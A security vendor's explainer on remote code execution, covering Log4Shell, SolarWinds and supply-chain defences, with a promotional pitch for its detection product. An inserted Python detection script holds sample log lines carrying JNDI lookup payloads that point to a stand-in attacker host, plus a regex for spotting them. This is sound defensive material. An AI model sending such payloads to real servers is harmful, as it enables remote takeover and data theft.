Remote code execution (RCE)
Detect and prevent RCE through Contrast Application Detection and Response (ADR)
Get a free trial of Contrast ADR and see how it can protect your applications from cyberattacks that result in RCE.
What is an RCE vulnerability?
RCE occurs when an attacker runs arbitrary code on a remote computer or server over a network. This type of attack exploits vulnerabilities in software, applications or network configurations to execute commands without needing physical access to the system.
How remote code execution attacks work
RCE vulnerabilities (i.e., vulnerabilities that can lead to RCE) are often exploited through injection attacks, such as a SQL injection, or by exploiting unpatched software flaws. Here’s how they generally work:
- Finding vulnerabilities: Attackers may look for security vulnerabilities in applications that allow for unauthorized code execution. Or if a system improperly validates inputs, attackers may inject code into form fields or URLs to run commands. Additionally, systems with loose security settings — like weak authentication mechanisms, misconfigured access controls and unrestricted remote procedure calls (RPCs) — can be exploited for RCE.
- Crafting malicious payloads: Attackers sometimes create code that exploits a vulnerability and injects a malicious payload into the target system. Another option is to use OS-level commands or scripts that the vulnerable system executes, giving the attacker control over the system. Still another option is to use shellcode — i.e., binary code that opens a command-line interface (CLI) — to run arbitrary commands on the target.
- Delivering malicious payloads: RCE payloads are often delivered through web requests, emails, compromised third-party applications and exploitation of vulnerable network protocols. Attackers may upload files that contain malicious code, which gets executed by the vulnerable system. Sometimes, attackers trick users into performing actions (e.g., clicking links or opening attachments) that trigger RCE.
- Gaining control and persistence: Once attackers can execute code, they may try to gain higher-level privileges (like admin access), expanding their control. They often install backdoors or other malicious software to maintain access even if the vulnerability is patched. Many attackers use command-and-control (C2) servers to communicate with compromised systems, issuing commands and retrieving data.
How attackers use RCE
RCE vulnerabilities can be extremely dangerous to an organization, as they can enable an attacker to do anything that a logged-in user can do in an account. Imagine the impact that could have in a business-critical application used to manage sensitive data: malicious actors could access confidential customer data (financial, personal or health information), employee data (personal or HR information) or intellectual property (product development data and go-to-market plans).
Examples of RCE attacks
Log4Shell, the vulnerability in the Log4j logging library, is a recent example of a highly impactful application-layer attack that allowed attackers to perform RCE by exploiting improper input handling. Log4Shell is the nickname given to the RCE vulnerability disclosed in the Log4j utility managed by the Apache Foundation. Specifically, Log4Shell refers to CVE-2021-44228 and associated vulnerabilities.
If an application is using a vulnerable version of Log4j, an attacker can trigger the application to reach out to an attacker-controlled host, which then deploys malicious code on the application’s server and gives the attacker control over the application and the server it sits on. Log4Shell is a critical vulnerability: it can allow attackers to execute malicious code remotely on a targeted server or application, and if exploited, the impact can include theft of data, installation of malware and full takeover of the system. A single web request can be enough to initiate a Log4j attack, and often that request can be sent before the user is authenticated.
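The two signals described above (a request carrying a lookup string, followed by the application server opening an outbound connection to a host it never normally talks to) are what a defender would correlate. The following is an added example, not code from the page or from Contrast; the log format, the placeholder host name `attacker-controlled.example` and the egress allowlist are all constructed assumptions.

```python
import re

# Constructed sample access-log lines in a simplified
# "client method path user-agent-or-body" format (not real traffic).
ACCESS_LOG = [
    '203.0.113.5 GET /index.html "Mozilla/5.0"',
    '198.51.100.7 GET /login "${jndi:ldap://attacker-controlled.example/a}"',
    '198.51.100.7 POST /api/search q=${JNDI:rmi://attacker-controlled.example/x}',
]

# Constructed outbound-connection records observed from the application host:
# (destination host, destination port, protocol).
OUTBOUND = [
    ("db.internal.example", 5432, "tcp"),
    ("attacker-controlled.example", 1389, "tcp"),
]

# Assumed allowlist: the only hosts the application tier should reach out to.
EGRESS_ALLOWLIST = {"db.internal.example", "cache.internal.example"}

# Case-insensitive match for a JNDI lookup marker anywhere in a log line.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, line) for each request line carrying a JNDI lookup."""
    return [(n, line) for n, line in enumerate(lines, 1) if JNDI_LOOKUP.search(line)]


def unexpected_egress(connections, allowlist):
    """Return outbound connections whose destination is not on the allowlist."""
    return [c for c in connections if c[0] not in allowlist]


def triage(lines, connections, allowlist):
    """Correlate both signals; together they are far stronger than either alone."""
    hits = find_jndi_lookups(lines)
    egress = unexpected_egress(connections, allowlist)
    return {
        "lookup_hits": hits,
        "unexpected_egress": egress,
        # A lookup string in a request AND an unexpected outbound connection
        # afterwards is the pattern of a successful Log4Shell-style trigger.
        "likely_exploitation": bool(hits) and bool(egress),
    }


if __name__ == "__main__":
    print(triage(ACCESS_LOG, OUTBOUND, EGRESS_ALLOWLIST))
```

In production the same correlation is done against real access logs and flow or firewall logs from the application tier; blocking egress to non-allowlisted hosts is also the mitigation that neutralizes the "reach out" step even before patching.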
Another serious RCE vulnerability was the attack on the SolarWinds Orion platform. Attackers first gained access to vulnerable systems in September 2019 and may have retained unfettered access until the attack’s discovery in December 2020.
How to detect and prevent RCE attacks
Every organization needs to think of the entire software supply chain when considering Application Security (AppSec):
- What you write: Custom code developed in-house accounts for most software vulnerabilities.
- What you build with: Organizations often do not track which developer tools are in use. More than 1,000 of these tools exist.
- What you use: Third-party libraries create a complex web of dependencies in an application.
- What you buy: Off-the-shelf software-as-a-service (SaaS) applications provide business-critical functionality, but their users have no control over the integrity of the software.
The best way to detect and prevent RCE attacks is to have robust protections in place in pre-production and production environments.
- In a pre-production environment, Software Composition Analysis (SCA) is hugely beneficial for examining the third-party libraries that your project uses for cybersecurity vulnerabilities.
- An Interactive Application Security Testing (IAST) solution can continuously detect and prioritize vulnerabilities while also guiding development teams on how to eliminate risks.
- ADR is ideal for production. Web application firewalls (WAFs) mainly provide visibility into attacks from low-skilled attackers and are generally poor at protecting against attacks that exploit logic flaws and zero-day vulnerabilities. Contrast ADR, by contrast, protects running applications and application programming interfaces (APIs) by stopping attacks that would otherwise bypass such first-line defense tools.
Contrast Security’s approach to Application Security (AppSec) is designed to eliminate entire classes of vulnerabilities. The Contrast Runtime Security Platform was created in response to the fact that applications are perpetually accosted by hackers intent on doing harm to your business. We recognize that it is virtually impossible to create applications that are completely free of vulnerabilities. The Runtime Security agent continuously detects and prevents both known threats and zero-day attacks by leveraging multi-technique precision sensors and dynamic control over the runtime. It offers an instrumentation-based approach that simplifies security deployment and scalability.
Get a free trial of Contrast ADR and see how it can protect your applications from RCE attacks.